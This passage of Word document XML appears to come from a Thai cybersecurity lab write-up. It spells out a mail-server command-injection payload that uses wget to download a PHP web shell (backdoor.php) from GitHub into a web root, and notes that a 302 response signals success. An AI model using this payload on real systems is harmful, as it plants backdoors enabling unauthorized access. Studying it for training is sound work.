          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>froot@localhost</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -be ${run{${</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>substr</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{0}{1}{$</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>spool_directory</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}}</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>${</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>substr</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{0}{1}{$</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>spool_directory</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}}bin${</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>substr</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{0}{1}{$</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>spool_directory</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}}</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>wget</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>${</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>substr</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{10}{1}{$</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tod_log</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}}--output-document${</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>substr</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{10}{1}{$</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tod_log</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}}${</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>substr</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{0}{1}{$</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>spool_directory</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}}var${</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>substr</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{0}{1}{$</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>spool_directory</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}}www${</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>substr</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{0}{1}{$</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>spool_directory</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}}html${</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>substr</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{0}{1}{$</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>spool_directory</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}}</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>backdoor.php</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>${</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>substr</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{10}{1}{$</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tod_log</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}}raw.githubusercontent.com${</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>substr</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{0}{1}{$</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>spool_directory</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}}materaj2${</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>substr</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{0}{1}{$</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>spool_directory</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}}</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>simplephpshell</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>${</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>substr</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{0}{1}{$</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>spool_directory</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}}master${</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>substr</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{0}{1}{$</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>spool_directory</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}}</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>backdoor.php</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}} null)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2C371C4C" w:rsidP="6EBF35C9" w:rsidRDefault="2C371C4C" w14:paraId="35DD8B1E" w14:textId="01FE640B">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidR="2C371C4C">
        <w:drawing>
          <wp:inline wp14:editId="051AA0FE" wp14:anchorId="7B985D2A">
            <wp:extent cx="2693586" cy="2391421"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5031767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03176728" name="Picture 503176728"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId78980727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93586" cy="2391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C371C4C">
        <w:rPr/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="2C371C4C">
        <w:rPr/>
        <w:t>ถ้าได้จะ</w:t>
      </w:r>
      <w:r w:rsidR="2C371C4C">
        <w:rPr/>
        <w:t xml:space="preserve"> response </w:t>
      </w:r>
      <w:r w:rsidR="2C371C4C">
        <w:rPr/>
        <w:t>จะขึ้น</w:t>
      </w:r>
      <w:r w:rsidR="2C371C4C">
        <w:rPr/>
        <w:t xml:space="preserve"> 302 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6EBF35C9" w:rsidP="6EBF35C9" w:rsidRDefault="6EBF35C9" w14:paraId="7F0961CF" w14:textId="7D644B59">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="44BC3E0F" w:rsidP="44BC3E0F" w:rsidRDefault="44BC3E0F" w14:paraId="63743281" w14:textId="27C7BB7E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="44BC3E0F" w:rsidRDefault="44BC3E0F" w14:paraId="07D8037A" w14:textId="3CE5B1D2">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="02F672CC" w:rsidP="44BC3E0F" w:rsidRDefault="02F672CC" w14:paraId="747D548C" w14:textId="40A04FF8">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:hyperlink r:id="Rfebb20e78e2049cb">
        <w:r w:rsidRPr="44BC3E0F" w:rsidR="02F672CC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://play.mooc.ncsa.or.th/lab/112</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
